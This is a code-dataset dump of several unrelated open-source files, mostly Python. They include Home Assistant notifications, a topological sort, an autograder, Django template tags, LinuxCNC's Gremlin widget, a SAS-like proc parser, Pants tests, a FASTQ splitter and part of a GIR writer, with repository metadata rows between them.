hass.states.async_remove(entity_id)
del persistent_notifications[entity_id]
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
@callback
def mark_read_service(call):
"""Handle the mark_read notification service call."""
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
if entity_id not in persistent_notifications:
_LOGGER.error(
"Marking persistent_notification read failed: "
"Notification ID %s not found.",
notification_id,
)
return
persistent_notifications[entity_id][ATTR_STATUS] = STATUS_READ
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
hass.services.async_register(
DOMAIN, SERVICE_CREATE, create_service, SCHEMA_SERVICE_CREATE
)
hass.services.async_register(
DOMAIN, SERVICE_DISMISS, dismiss_service, SCHEMA_SERVICE_DISMISS
)
hass.services.async_register(
DOMAIN, SERVICE_MARK_READ, mark_read_service, SCHEMA_SERVICE_MARK_READ
)
hass.components.websocket_api.async_register_command(
WS_TYPE_GET_NOTIFICATIONS, websocket_get_notifications, SCHEMA_WS_GET
)
return True
@callback
def websocket_get_notifications(
hass: HomeAssistant, connection: websocket_api.ActiveConnection, msg
):
"""Return a list of persistent_notifications."""
connection.send_message(
websocket_api.result_message(
msg["id"],
[
{
key: data[key]
for key in (
ATTR_NOTIFICATION_ID,
ATTR_MESSAGE,
ATTR_STATUS,
ATTR_TITLE,
ATTR_CREATED_AT,
)
}
for data in hass.data[DOMAIN]["notifications"].values()
],
)
)
|
apache-2.0
| 7,887,698,443,924,102,000
| 30
| 86
| 0.639401
| false
| 4.037209
| false
| false
| false
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/lib/galaxy/util/topsort.py
|
1
|
7495
|
"""
Topological sort.
From Tim Peters, see:
http://mail.python.org/pipermail/python-list/1999-July/006660.html
topsort takes a list of pairs, where each pair (x, y) is taken to
mean that x <= y wrt some abstract partial ordering. The return
value is a list, representing a total ordering that respects all
the input constraints.
E.g.,
topsort( [(1,2), (3,3)] )
Valid topological sorts would be any of (but nothing other than)
[3, 1, 2]
[1, 3, 2]
[1, 2, 3]
... however this variant ensures that 'key' order (first element of
tuple) is preserved so the following will be result returned:
[1, 3, 2]
because those are the permutations of the input elements that
respect the "1 precedes 2" and "3 precedes 3" input constraints.
Note that a constraint of the form (x, x) is really just a trick
to make sure x appears *somewhere* in the output list.
If there's a cycle in the constraints, say
topsort( [(1,2), (2,1)] )
then CycleError is raised, and the exception object supports
many methods to help analyze and break the cycles. This requires
a good deal more code than topsort itself!
"""
from galaxy.util.odict import odict as OrderedDict
from exceptions import Exception
class CycleError(Exception):
def __init__(self, sofar, numpreds, succs):
Exception.__init__(self, "cycle in constraints",
sofar, numpreds, succs)
self.preds = None
# return as much of the total ordering as topsort was able to
# find before it hit a cycle
def get_partial(self):
return self[1]
# return remaining elt -> count of predecessors map
def get_pred_counts(self):
return self[2]
# return remaining elt -> list of successors map
def get_succs(self):
return self[3]
# return remaining elements (== those that don't appear in
# get_partial())
def get_elements(self):
return self.get_pred_counts().keys()
# Return a list of pairs representing the full state of what's
# remaining (if you pass this list back to topsort, it will raise
# CycleError again, and if you invoke get_pairlist on *that*
# exception object, the result will be isomorphic to *this*
# invocation of get_pairlist).
# The idea is that you can use pick_a_cycle to find a cycle,
# through some means or another pick an (x,y) pair in the cycle
# you no longer want to respect, then remove that pair from the
# output of get_pairlist and try topsort again.
def get_pairlist(self):
succs = self.get_succs()
answer = []
for x in self.get_elements():
if succs.has_key(x):
for y in succs[x]:
answer.append( (x, y) )
else:
# make sure x appears in topsort's output!
answer.append( (x, x) )
return answer
# return remaining elt -> list of predecessors map
def get_preds(self):
if self.preds is not None:
return self.preds
self.preds = preds = OrderedDict()
remaining_elts = self.get_elements()
for x in remaining_elts:
preds[x] = []
succs = self.get_succs()
for x in remaining_elts:
if succs.has_key(x):
for y in succs[x]:
preds[y].append(x)
if __debug__:
for x in remaining_elts:
assert len(preds[x]) > 0
return preds
# return a cycle [x, ..., x] at random
def pick_a_cycle(self):
remaining_elts = self.get_elements()
# We know that everything in remaining_elts has a predecessor,
# but don't know that everything in it has a successor. So
# crawling forward over succs may hit a dead end. Instead we
# crawl backward over the preds until we hit a duplicate, then
# reverse the path.
preds = self.get_preds()
from random import choice
x = choice(remaining_elts)
answer = []
index = OrderedDict()
in_answer = index.has_key
while not in_answer(x):
index[x] = len(answer) # index of x in answer
answer.append(x)
x = choice(preds[x])
answer.append(x)
answer = answer[index[x]:]
answer.reverse()
return answer
def topsort(pairlist):
numpreds = OrderedDict() # elt -> # of predecessors
successors = OrderedDict() # elt -> list of successors
for first, second in pairlist:
# make sure every elt is a key in numpreds
if not numpreds.has_key(first):
numpreds[first] = 0
if not numpreds.has_key(second):
numpreds[second] = 0
# if they're the same, there's no real dependence
if first == second:
continue
# since first < second, second gains a pred ...
numpreds[second] = numpreds[second] + 1
# ... and first gains a succ
if successors.has_key(first):
successors[first].append(second)
else:
successors[first] = [second]
# suck up everything without a predecessor
answer = filter(lambda x, numpreds=numpreds: numpreds[x] == 0,
numpreds.keys())
# for everything in answer, knock down the pred count on
# its successors; note that answer grows *in* the loop
for x in answer:
assert numpreds[x] == 0
del numpreds[x]
if successors.has_key(x):
for y in successors[x]:
numpreds[y] = numpreds[y] - 1
if numpreds[y] == 0:
answer.append(y)
# following "del" isn't needed; just makes
# CycleError details easier to grasp
del successors[x]
if numpreds:
# everything in numpreds has at least one predecessor ->
# there's a cycle
if __debug__:
for x in numpreds.keys():
assert numpreds[x] > 0
raise CycleError(answer, numpreds, successors)
return answer
def topsort_levels(pairlist):
numpreds = OrderedDict() # elt -> # of predecessors
successors = OrderedDict() # elt -> list of successors
for first, second in pairlist:
# make sure every elt is a key in numpreds
if not numpreds.has_key(first):
numpreds[first] = 0
if not numpreds.has_key(second):
numpreds[second] = 0
# if they're the same, there's no real dependence
if first == second:
continue
# since first < second, second gains a pred ...
numpreds[second] = numpreds[second] + 1
# ... and first gains a succ
if successors.has_key(first):
successors[first].append(second)
else:
successors[first] = [second]
answer = []
while 1:
# Suck up everything without a predecessor.
levparents = [x for x in numpreds.keys() if numpreds[x] == 0]
if not levparents:
break
answer.append( levparents )
for levparent in levparents:
del numpreds[levparent]
if successors.has_key(levparent):
for levparentsucc in successors[levparent]:
numpreds[levparentsucc] -= 1
del successors[levparent]
if numpreds:
# Everything in num_parents has at least one child ->
# there's a cycle.
raise CycleError( answer, numpreds, successors )
return answer
|
gpl-3.0
| -1,747,945,830,861,587,700
| 32.311111
| 70
| 0.598799
| false
| 3.816191
| false
| false
| false
|
crscardellino/thesis
|
thesis/scripts/unlabeled_corpora_meta.py
|
1
|
1429
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import sys
from functools import partial
from multiprocessing import Pool
from tabulate import tabulate
from thesis.utils import find
def process_file(ifile, meta):
print('Processing %s' % ifile, file=sys.stderr)
basename = os.path.basename(ifile)
ofile = os.path.join(args.output, basename)
with open(ifile, 'r') as fin, open(ofile, 'w') as fout:
sentence = []
sentences = 0
for line in fin:
line = line.strip().split()
if not line and sentence:
print('META:%s sentence:%05d file:%s words:%03d'
% (meta, sentences, basename, len(sentence)), file=fout)
print(tabulate(sentence, tablefmt='plain'), end='\n\n', file=fout)
sentence = []
sentences += 1
elif line:
sentence.append(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('input')
parser.add_argument('output')
parser.add_argument('meta')
parser.add_argument('--pattern', default='*')
parser.add_argument('--workers', type=int, default=12)
args = parser.parse_args()
with Pool(args.workers) as p:
p.map(partial(process_file, meta=args.meta), find(args.input, args.pattern))
|
mit
| -7,308,446,227,549,357,000
| 28.163265
| 84
| 0.604619
| false
| 3.820856
| false
| false
| false
|
maxspad/MGrader
|
autograder/modules/questions/PythonQuestion.py
|
1
|
2436
|
'''
Contains the PythonQuestion class, which is an instructor-facing
question type that implements a grade() function.
All instructor-facing Question modules must implement
a grade() function at module level that returns a Result object.
@author: Max Spadafore
'''
from AbstractQuestion import AbstractQ
table_name = 'grades_python'
f_uname = 'uname'
f_ptspos = 'ptspos'
f_ptsrec = 'ptsrec'
f_timestamp = 'timestamp_unix'
TABLE_CREATE = '''CREATE TABLE {0}
({1} TEXT PRIMARY KEY NOT NULL,
{2} INTEGER NOT NULL,
{3} INTEGER NOT NULL,
{4} INTEGER NOT NULL)'''.format(table_name, f_uname, f_ptspos, f_ptsrec, f_timestamp)
def initialize():
'''import autograder.modules.Database as dbm
db = dbm.DAL(connect=True)
db.createTable(TABLE_CREATE)
db.disconnect()'''
def process_cmd(cmdstr, args):
raise NotImplementedError
def grade(uname, assigname, tcname, inputs, outputs, insprog, rtimeout, ctimeout, diffcmd, runcmd, makefile=None, target=None):
'''
Called by the GSM after dynamic import. Takes its parameters, acts on them if it wishes, and passes them along to the
CPPQuestion class, which handles them. It then calls the CPPQuestion grade() function and returns its Result object.
@return: The Result object representing the result of the question's grading.
'''
question = PythonQ(uname, assigname, tcname, inputs, outputs, insprog, rtimeout, ctimeout, diffcmd, runcmd, makefile=makefile, maketarget=target)
return question.grade()
class PythonQ(AbstractQ):
'''
An instructor-facing Question grading class designed to grade python programs.
Utilizes functions from AbstractQ
@see: AbstractQ
'''
def grade(self):
# move to student dir
self.chdirToStudent()
# Run (AbstractQuestion)
self.openFiles('student')
result = self.runStudentCode()
if result[0] == False:
self.chdirToGraderHome()
return self.failStudent(result)
self.closeFiles()
self.chdirToGraderHome()
self.chdirToInstructor()
self.openFiles('instructor')
self.runInstructorCode()
result = self.compareOutputs()
if result[0] == False:
self.chdirToGraderHome()
return self.failStudent(result)
self.closeFiles()
self.chdirToGraderHome()
return self.passStudent()
def getQType(self):
return 'PythonQuestion'
|
bsd-3-clause
| 555,966,247,296,795,100
| 31.932432
| 149
| 0.688013
| false
| 3.85443
| false
| false
| false
|
siggame/webserver
|
webserver/hermes/templatetags/hermes_tags.py
|
1
|
3396
|
from django import template
from django.template.defaultfilters import stringfilter
from competition.models.game_model import Game
import slumber
import datetime
import logging
import requests
logger = logging.getLogger(__name__)
register = template.Library()
@register.filter
@stringfilter
def iso_to_datetime(value):
try:
return datetime.datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")
except ValueError:
pass
try:
return datetime.datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f")
except ValueError:
return ""
@register.assignment_tag
def centered_list(value, center=None, size=None):
if size is None or center is None:
return value
if len(value) == 0:
return value
size = int(size)
start = center - size / 2 - 1
stop = center + size / 2
if start < 0:
stop = size
start = 0
if stop >= len(value):
start = len(value) - size
stop = len(value)
return value[start:stop]
class CheckEmbargoedNode(template.Node):
def __init__(self, team, variable_name):
self.team = team
self.variable_name = variable_name
def render(self, context):
team = context[self.team]
try:
# Get the last game played
last_game = team.game_set.latest()
# Grab the API url from the last Game that was played
url = last_game.data['api_url']
# Query API
response = slumber.API(url).client.get(name=team.slug)
# Make sure that we only get one client item back.
assert response['meta']['total_count'] == 1
# Get "embargoed" from returned client
if response['objects'][0]['embargoed']:
result = "embargoed"
else:
result = "unembargoed"
except Game.DoesNotExist:
result = "not ready"
except slumber.exceptions.ImproperlyConfigured:
result = "error"
logger.error("Bad arena URL: {}".format(url))
except (TypeError, KeyError), e:
result = "error"
logger.error("Error grabbing game data: {}".format(str(e)))
except slumber.exceptions.HttpClientError:
result = "error"
logger.error("Couldn't connect to arena api ({})".format(url))
except slumber.exceptions.HttpServerError:
result = "error"
logger.error("Arena server error ({})".format(url))
except requests.exceptions.ConnectionError:
result = "error"
logger.error("Connection to arena api timed out ({})".format(url))
except AssertionError:
result = "error"
if response['meta']['total_count'] > 1:
msg = 'Found more than one team with slug "{}" in arena'
else:
msg = 'Found zero teams with slug "{}" in arena'
logger.error(msg.format(team.slug))
context[self.variable_name] = result
return ""
@register.tag
def check_embargoed(parser, token):
try:
tag_name, team, _as, variable = token.split_contents()
except ValueError:
tag_name = token.contents.split()[0]
msg = '{0} should be "{0} <team> as <variable>"'
raise template.TemplateSyntaxError(msg.format(tag_name))
return CheckEmbargoedNode(team, variable)
|
bsd-3-clause
| -4,488,372,421,264,011,300
| 29.594595
| 78
| 0.5904
| false
| 4.101449
| false
| false
| false
|
ianmcmahon/linuxcnc-mirror
|
lib/python/gladevcp/hal_gremlin.py
|
1
|
9842
|
#!/usr/bin/env python
# vim: sts=4 sw=4 et
# GladeVcp Widgets
#
# Copyright (c) 2010 Pavel Shramov <shramov@mexmat.net>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import os
import gtk, gobject
import linuxcnc
import gremlin
import rs274.glcanon
import gcode
from hal_actions import _EMC_ActionBase
from hal_glib import GStat
class HAL_Gremlin(gremlin.Gremlin, _EMC_ActionBase):
__gtype_name__ = "HAL_Gremlin"
__gproperties__ = {
'view' : ( gobject.TYPE_STRING, 'View type', 'Default view: p, x, y, y2, z, z2',
'p', gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'enable_dro' : ( gobject.TYPE_BOOLEAN, 'Enable DRO', 'Show DRO on graphics',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'metric_units' : ( gobject.TYPE_BOOLEAN, 'Use Metric Units', 'Show DRO in metric or imperial units',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_relative' : ( gobject.TYPE_BOOLEAN, 'Show Relative', 'Show DRO relative to active system or machine origin',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_commanded' : ( gobject.TYPE_BOOLEAN, 'Show Commanded', 'Show commanded or actual position',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_extents_option' : ( gobject.TYPE_BOOLEAN, 'Show Extents', 'Show machine extents',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_limits' : ( gobject.TYPE_BOOLEAN, 'Show limits', 'Show machine limits',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_live_plot' : ( gobject.TYPE_BOOLEAN, 'Show live plot', 'Show machine plot',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_velocity' : ( gobject.TYPE_BOOLEAN, 'Show tool speed', 'Show tool velocity',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_program' : ( gobject.TYPE_BOOLEAN, 'Show program', 'Show program',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_rapids' : ( gobject.TYPE_BOOLEAN, 'Show rapids', 'Show rapid moves',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_tool' : ( gobject.TYPE_BOOLEAN, 'Show tool', 'Show tool',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_dtg' : ( gobject.TYPE_BOOLEAN, 'Show DTG', 'Show Distance To Go',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_lathe_radius' : ( gobject.TYPE_BOOLEAN, 'Show Lathe Radius', 'Show X axis in Radius',
False, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'grid_size' : ( gobject.TYPE_FLOAT, 'Grid Size', 'Grid Size',
0, 100, 0, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_joints_mode' : ( gobject.TYPE_BOOLEAN, 'Use joints mode', 'Use joints mode',
False, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_default_controls' : ( gobject.TYPE_BOOLEAN, 'Use Default Mouse Controls', 'Use Default Mouse Controls',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
}
__gproperties = __gproperties__
def __init__(self, *a, **kw):
inifile = os.environ.get('INI_FILE_NAME', '/dev/null')
inifile = linuxcnc.ini(inifile)
gremlin.Gremlin.__init__(self, inifile)
self.gstat = GStat()
self.gstat.connect('file-loaded', self.fileloaded)
self.show()
def fileloaded(self,w,f):
try:
self._load(f)
except AttributeError,detail:
#AttributeError: 'NoneType' object has no attribute 'gl_end'
print 'hal_gremlin: continuing after',detail
def do_get_property(self, property):
name = property.name.replace('-', '_')
if name == 'view':
return self.current_view
elif name in self.__gproperties.keys():
return getattr(self, name)
else:
raise AttributeError('unknown property %s' % property.name)
def do_set_property(self, property, value):
name = property.name.replace('-', '_')
if name == 'view':
view = value.lower()
if self.lathe_option:
if view not in ['p','y','y2']:
return False
elif view not in ['p', 'x', 'y', 'z', 'z2']:
return False
self.current_view = view
if self.initialised:
self.set_current_view()
elif name == 'enable_dro':
self.enable_dro = value
elif name == 'metric_units':
self.metric_units = value
elif name in self.__gproperties.keys():
setattr(self, name, value)
else:
raise AttributeError('unknown property %s' % property.name)
self.queue_draw()
return True
# This overrides glcannon.py method so we can change the DRO
def dro_format(self,s,spd,dtg,limit,homed,positions,axisdtg,g5x_offset,g92_offset,tlo_offset):
if not self.enable_dro:
return limit, homed, [''], ['']
if self.metric_units:
format = "% 6s:% 9.3f"
if self.show_dtg:
droformat = " " + format + " DTG %1s:% 9.3f"
else:
droformat = " " + format
offsetformat = "% 5s %1s:% 9.3f G92 %1s:% 9.3f"
rotformat = "% 5s %1s:% 9.3f"
else:
format = "% 6s:% 9.4f"
if self.show_dtg:
droformat = " " + format + " DTG %1s:% 9.4f"
else:
droformat = " " + format
offsetformat = "% 5s %1s:% 9.4f G92 %1s:% 9.4f"
rotformat = "% 5s %1s:% 9.4f"
diaformat = " " + format
posstrs = []
droposstrs = []
for i in range(9):
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
posstrs.append(format % (a, positions[i]))
if self.show_dtg:
droposstrs.append(droformat % (a, positions[i], a, axisdtg[i]))
else:
droposstrs.append(droformat % (a, positions[i]))
droposstrs.append("")
for i in range(9):
index = s.g5x_index
if index<7:
label = "G5%d" % (index+3)
else:
label = "G59.%d" % (index-6)
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
droposstrs.append(offsetformat % (label, a, g5x_offset[i], a, g92_offset[i]))
droposstrs.append(rotformat % (label, 'R', s.rotation_xy))
droposstrs.append("")
for i in range(9):
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
droposstrs.append(rotformat % ("TLO", a, tlo_offset[i]))
# if its a lathe only show radius or diameter as per property
# we have to adjust the homing icon to line up:
if self.is_lathe():
if homed[0]:
homed.pop(0)
homed.pop(0)
homed.insert(0,1)
homed.insert(0,0)
posstrs[0] = ""
if self.show_lathe_radius:
posstrs.insert(1, format % ("Rad", positions[0]))
else:
posstrs.insert(1, format % ("Dia", positions[0]*2.0))
droposstrs[0] = ""
if self.show_dtg:
if self.show_lathe_radius:
droposstrs.insert(1, droformat % ("Rad", positions[0], "R", axisdtg[0]))
else:
droposstrs.insert(1, droformat % ("Dia", positions[0]*2.0, "D", axisdtg[0]*2.0))
else:
if self.show_lathe_radius:
droposstrs.insert(1, droformat % ("Rad", positions[0]))
else:
droposstrs.insert(1, diaformat % ("Dia", positions[0]*2.0))
if self.show_velocity:
posstrs.append(format % ("Vel", spd))
pos=0
for i in range(9):
if s.axis_mask & (1<<i): pos +=1
if self.is_lathe:
pos +=1
droposstrs.insert(pos, " " + format % ("Vel", spd))
if self.show_dtg:
posstrs.append(format % ("DTG", dtg))
return limit, homed, posstrs, droposstrs
def realize(self, widget):
gremlin.Gremlin.realize(self, widget)
@rs274.glcanon.with_context
def _load(self, filename):
return self.load(filename)
# TODO fix this so it doesn't print twice and it should probably pop up a dialog
def report_gcode_error(self, result, seq, filename):
error_str = gcode.strerror(result)
print("G-Code error in " + os.path.basename(filename) + "\n" + "Near line "
+ str(seq) + " of\n" + filename + "\n" + error_str + "\n")
|
lgpl-2.1
| 7,631,646,314,919,300,000
| 43.533937
| 121
| 0.536883
| false
| 3.69722
| false
| false
| false
|
chappers/Stan
|
stan/proc/proc_parse.py
|
1
|
1781
|
"""
The :mod:`stan.proc.proc_parse` module is the proc parser for SAS-like language.
"""
import re
import pkgutil
from stan.proc.proc_expr import RESERVED_KEYWORDS, PROC_
import stan.proc_functions as proc_func
from stan.proc.proc_sql import proc_sql
def proc_parse(cstr):
"""proc parse converts procedure statements to python function equivalents
Parameters
----------
v_ls : list of tokens
Notes
-----
``data`` and ``output``/``out`` are protected variables.
If you wish to use a DataFrame as an argument, prepend ``dt_`` for the parser to interpret this correctly
"""
# if cstr is in the form "proc sql" we won't pass tokens
if re.match(r"^\s*proc\s*sql", cstr.strip(), re.IGNORECASE):
return proc_sql(cstr.strip())
v_ls = PROC_.parseString(cstr)
sls = []
preprend = ''
for ls in v_ls[1:]:
if len(ls[1:]) > 1:
sls.append("%s=['%s']" % (ls[0], "','".join(ls[1:])))
else:
if ls[0].startswith('dt_') or ls[0] in ['data']: # hungarian notation if we want to use DataFrame as a variable
sls.append("%s=%s" % (ls[0], ls[1]))
elif ls[0] in ['output', 'out']:
preprend += '%s=' % ls[1]
else:
sls.append("%s='%s'" % (ls[0], ls[1]))
# try to find v_ls[0] in the `proc_func` namespace...
f_name = v_ls[0].strip().lower()
if f_name in [name for _, name, _ in pkgutil.iter_modules(proc_func.__path__)]: # is there a better way?
func_name = "%s.%s" % (f_name, f_name)
else:
func_name = f_name
return '%s%s(%s)' % (preprend, func_name, ','.join(sls)) # this statement is a bit dodgy
|
mit
| -3,020,345,216,742,110,000
| 29.706897
| 123
| 0.540707
| false
| 3.36673
| false
| false
| false
|
tdyas/pants
|
tests/python/pants_test/backend/jvm/tasks/jvm_compile/rsc/test_rsc_compile_integration.py
|
1
|
2189
|
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import pytest
from pants_test.backend.jvm.tasks.jvm_compile.rsc.rsc_compile_integration_base import (
RscCompileIntegrationBase,
ensure_compile_rsc_execution_strategy,
)
class RscCompileIntegration(RscCompileIntegrationBase):
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/7856")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_basic_binary(self):
self._testproject_compile("mutual", "bin", "A")
@ensure_compile_rsc_execution_strategy(
RscCompileIntegrationBase.rsc_and_zinc,
PANTS_COMPILE_RSC_SCALA_WORKFLOW_OVERRIDE="zinc-only",
)
def test_workflow_override(self):
self._testproject_compile("mutual", "bin", "A", outline_result=False)
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_executing_multi_target_binary(self):
pants_run = self.do_command("run", "examples/src/scala/org/pantsbuild/example/hello/exe")
self.assertIn("Hello, Resource World!", pants_run.stdout_data)
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/8679")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_java_with_transitive_exported_scala_dep(self):
self.do_command(
"compile",
"testprojects/src/scala/org/pantsbuild/testproject/javadepsonscalatransitive:java-in-different-package",
)
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_java_sources(self):
self.do_command("compile", "testprojects/src/scala/org/pantsbuild/testproject/javasources")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_node_dependencies(self):
self.do_command(
"compile", "contrib/node/examples/src/java/org/pantsbuild/testproject/jsresources"
)
def test_rsc_hermetic_jvm_options(self):
self._test_hermetic_jvm_options(self.rsc_and_zinc)
|
apache-2.0
| -6,702,051,356,664,883,000
| 43.673469
| 116
| 0.727273
| false
| 3.331811
| true
| false
| false
|
Magda-M/general-tools
|
fq.split.py
|
1
|
2084
|
"""
SOURCE: https://gist.github.com/brentp/6625544
split a single fastq file in to random, non-overlapping subsets
arguments:
+ fastq file
+ number of splits
+ number of reps
e.g.:
python fq.split.py input.fastq 3 4
will create 12 new files in 4 sets of 3. Each
set of 3 will contain all of the original records.
"""
import gzip
import random
from itertools import islice, izip
xopen = lambda fq: gzip.open(fq) if fq.endswith('.gz') else open(fq)
def fqiter(fq, lines_per_read):
with xopen(fq) as fh:
fqclean = (x.strip("\r\n") for x in fh if x.strip())
while True:
rec = [x for x in islice(fqclean, lines_per_read)]
if not rec: raise StopIteration
assert all(rec) and len(rec) == lines_per_read
yield rec
def fqsplit(fq, nchunks, nreps, paired, prefix=None):
if paired:
lines_per_read = 8
else:
lines_per_read = 4
if prefix == None: prefix = fq + ".split"
prefix += "chunk-%i.rep-%i.fq"
fq_size = sum(1 for x in xopen(fq) if len(x.strip("\r\n"))>0)
assert fq_size % lines_per_read == 0
fq_size /= lines_per_read # number of records
print >>sys.stderr, "num reads/read pairs:", fq_size
print >>sys.stderr, "num chunks to split into:", nchunks
if fq_size % nchunks == 0 :
chunk_size = fq_size // nchunks
else:
chunk_size = 1 + (fq_size) // nchunks
print >>sys.stderr, "chunk_size:", chunk_size
for rep in range(1, nreps + 1):
files = [open(prefix % (c, rep), 'w') for c in range(1, nchunks + 1)]
ints = range(fq_size)
random.shuffle(ints)
for i, fqr in izip(ints, fqiter(fq, lines_per_read)):
chunk, chunk_i = divmod(i, chunk_size)
print >>files[chunk], "\n".join(fqr)
[f.close() for f in files]
if __name__ == "__main__":
import sys
fq = sys.argv[1]
nchunks = int(sys.argv[2])
nreps = int(sys.argv[3])
paired = bool(int(sys.argv[4]))
print paired# 0 = single, 1 = paired end reads
fqsplit(fq, nchunks, nreps, paired)
|
gpl-3.0
| 607,869,430,377,086,200
| 27.561644
| 77
| 0.597409
| false
| 3.143288
| false
| false
| false
|
goniz/buildscript
|
build_system/source.py
|
1
|
2177
|
#!/usr/bin/python2
from build_exceptions import BuildError
import os
import re
class File(object):
def __init__(self, path):
self.path = path
def is_newer(self, other):
if os.path.exists(other) is False:
return True
if os.path.exists(self.path) is False:
raise BuildError('SourceFile.path does not exists??')
obj = os.stat(other).st_ctime
me = os.stat(self.path).st_ctime
if me > obj:
return True
return False
@property
def extension(self):
regex = '\.(\w+)$'
return re.findall(regex, self.path)[0]
@property
def filename(self):
return os.path.basename(self.path)
def __str__(self):
return self.filename
def __repr__(self):
return str(self)
class Directory(object):
def __init__(self, path, exts=None):
self.path = path
if isinstance(exts, str):
self.extensions = [exts]
elif not isinstance(exts, list):
raise TypeError('exts should be a list of strings! got %s' % (exts, ))
else:
self.extensions = [] if exts is None else exts
def add_extension(self, ext):
if not ext in self.extensions:
self.extensions.append(ext)
def generate_regex(self):
return '\.(%s)$' % ('|'.join(self.extensions), )
def discover(self, output=File):
regex = self.generate_regex()
files = os.listdir(self.path)
files = map(lambda x: os.path.join(self.path, x), files)
files = filter(lambda x: re.findall(regex, x), files)
return map(output, files)
class SourceFile(File):
@property
def objectfile(self):
return self.filename.replace(self.extension, 'o')
@property
def language(self):
ext = self.extension
if 'c' == ext:
return 'c'
elif 'py' == ext:
return 'python'
elif 'cpp' == ext:
return 'cpp'
else:
return 'Unknown'
class SourceDirectory(Directory):
def discover(self, output=SourceFile):
return super(self.__class__, self).discover(output)
|
mit
| -8,906,877,451,912,974,000
| 24.623529
| 82
| 0.569132
| false
| 3.859929
| false
| false
| false
|
dkkline/CanSat14-15
|
presenter/__init__.py
|
1
|
1230
|
"""
Contains a Flask-based webserver in charge of presenting a website and
collected data to users connected via a webbrowser.
"""
__version__ = (0, 0, 1)
from .app import app
from .config import DevelopmentConfig, ProductionConfig
from flask_debugtoolbar import DebugToolbarExtension
def run_dev():
"""
Runs the presenter module in developer mode.
"""
# pylint: disable=unused-variable
from . import views # noqa
# pylint: enable=unused-variable
app.config.from_object(DevelopmentConfig)
toolbar = DebugToolbarExtension(app)
app.run(use_reloader=False, host=DevelopmentConfig.HOST,
port=DevelopmentConfig.PORT)
def run_prod():
"""
Runs the presenter module in production mode.
"""
# pylint: disable=unused-variable
from . import views # noqa
# pylint: enable=unused-variable
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from presenter import app
app.config.from_object(ProductionConfig)
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(ProductionConfig.PORT)
IOLoop.instance().start()
if __name__ == '__main__':
run()
|
mit
| -3,177,141,107,318,055,400
| 22.653846
| 70
| 0.701626
| false
| 4.072848
| true
| false
| false
|
alexef/gobject-introspection
|
giscanner/girwriter.py
|
1
|
23830
|
# -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2008 Johan Dahlin
# Copyright (C) 2008, 2009 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
from __future__ import with_statement
from . import ast
from .xmlwriter import XMLWriter
# Bump this for *incompatible* changes to the .gir.
# Compatible changes we just make inline
COMPATIBLE_GIR_VERSION = '1.2'
class GIRWriter(XMLWriter):
def __init__(self, namespace, shlibs, includes, pkgs, c_includes):
super(GIRWriter, self).__init__()
self.write_comment(
'''This file was automatically generated from C sources - DO NOT EDIT!
To affect the contents of this file, edit the original C definitions,
and/or use gtk-doc annotations. ''')
